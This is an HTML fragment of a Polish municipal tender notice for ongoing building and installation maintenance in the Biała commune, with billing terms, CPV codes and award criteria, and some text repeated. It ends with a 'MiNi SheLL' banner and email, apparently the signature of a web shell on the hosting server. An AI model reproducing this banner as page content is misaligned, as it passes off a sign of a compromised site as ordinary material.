Wykonawca zobowiązuje się załatwić sprawy administracyjno- formalne umożliwiające prawidłowe rozpoczęcie prac, jeżeli wymagają tego stosowne przepisy.
Rozliczenie za wykonanie przedmiotu odbioru odbywać się będzie  fakturami   po  zakończeniu i odbiorze  robót. 
Do faktury Wykonawca załącza:
a)    kosztorys powykonawczy
- przy rozliczaniu robót kosztorysami powykonawczymi należy zastosować jednostkowe ceny materiałów, które nie mogą przekroczyć  średnich jednostkowych cen materiałów, publikowanych w  Informacjach o cenach materiałów..SEKOCENBUD, aktualnych w dniu odbioru.
c)    protokół  odbioru robót potwierdzony przez obie strony..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Techniczna obsługa stała w zakresie robót budowlanych i instalacyjnych  w budynkach i na zewnątrz lokali użytkowych w mieście i gminie Biała, polegającą na usuwaniu awarii, wykonywaniu konserwacji oraz remontów o wartości zlecenia jednorazowo nie przekraczającej kwoty 10 000,00 zł netto..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Techniczna obsługa stała świadczona będzie w budynkach komunalnych  będących własnością Gminy Biała,
b) Poprzez techniczną obsługę stałą rozumie się wykonywanie robót ogólnobudowlanych
c) Przez roboty budowlane rozumie się między innymi roboty: murarsko-tynkarskie, stolarskie, malarskie, ciesielskie, szklarskie, ślusarskie, dekarskie, betoniarskie, ziemne, zduńskie, oraz należy przez to rozumieć budowę, a także prace polegające na przebudowie, montażu, remoncie lub rozbiórce obiektu budowlanego
d)  Przez roboty instalacyjne rozumie się roboty: wod - kan (zewnętrznej i wewnętrznej), c. o, elektryczne.
e) Przez awarię rozumie się: wydarzenie nagłe dotyczące uszkodzenia elementu budynku, którego wystąpienia  nie można było przewidzieć a wymagające natychmiastowej naprawy. 
f) Wykonawca wykona przedmiot zamówienia z materiałów własnych.
g) Prace należy wykonać zgodnie z ustaleniami Zamawiającego, zgodnie                            z obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
Czas reakcji na zgłoszenie do 1,5 godz. 
Wskaźnik kosztów transportu 1% - 2%.
Wysokość marży na zakupione przez Wykonawcę materiały 0%.
Zamawiający dopuszcza wykonania części robót przez podwykonawcę.
Wartość materiału użytego podczas zleconych prac rozliczona będzie na podstawie kserokopii faktur zakupu, według cen zakupu oferowanych przez bezpośredniego sprzedawcę (hurtownia, producent).
Podstawę wyceny zleconych robót stanowić będą normy określone w stosownych katalogach nakładów rzeczowych KNR.
Wykonawca zobowiązuje się wykonywać zakres zleconych prac zgodnie z dokonywanymi każdorazowo ustaleniami z Zamawiającym, zasadami współczesnej wiedzy technicznej, fachowo i rzetelnie, zgodnie z obowiązującymi przepisami  i normami dotyczącymi przedmiotu zamówienia.
Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo robót, mienia i osób postronnych oraz porządek na terenie zaplecza i placu budowy po ich protokolarnym przejęciu od Zamawiającego, jeżeli wymaga tego zapewnienie bezpieczeństwa podczas ich realizacji.
Wykonawca zapewnia zgodne z przepisami zabezpieczenie terenu, na którym wykonywać będzie przedmiot zamówienia oraz ponosi odpowiedzialność za ewentualne szkody wynikłe  z nieprawidłowego zabezpieczenia miejsca wykonywanych prac.
Wykonawca zobowiązuje się do uporządkowania terenu po zakończeniu remontu na swój koszt.
Wykonawca zgłosi do odbioru przez Zamawiającego wykonany przez siebie przedmiot umowy i będzie uczestniczył w odbiorze.
Wykonawca zobowiązuje się załatwić sprawy administracyjno- formalne umożliwiające prawidłowe rozpoczęcie prac, jeżeli wymagają tego stosowne przepisy.
Rozliczenie za wykonanie przedmiotu odbioru odbywać się będzie  fakturami   po  zakończeniu i odbiorze  robót. 
Do faktury Wykonawca załącza:
a)    kosztorys powykonawczy
- przy rozliczaniu robót kosztorysami powykonawczymi należy zastosować jednostkowe ceny materiałów, które nie mogą przekroczyć  średnich jednostkowych cen materiałów, publikowanych w  Informacjach o cenach materiałów.. SEKOCENBUD, aktualnych w dniu odbioru.
c)    protokół  odbioru robót potwierdzony przez obie strony..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com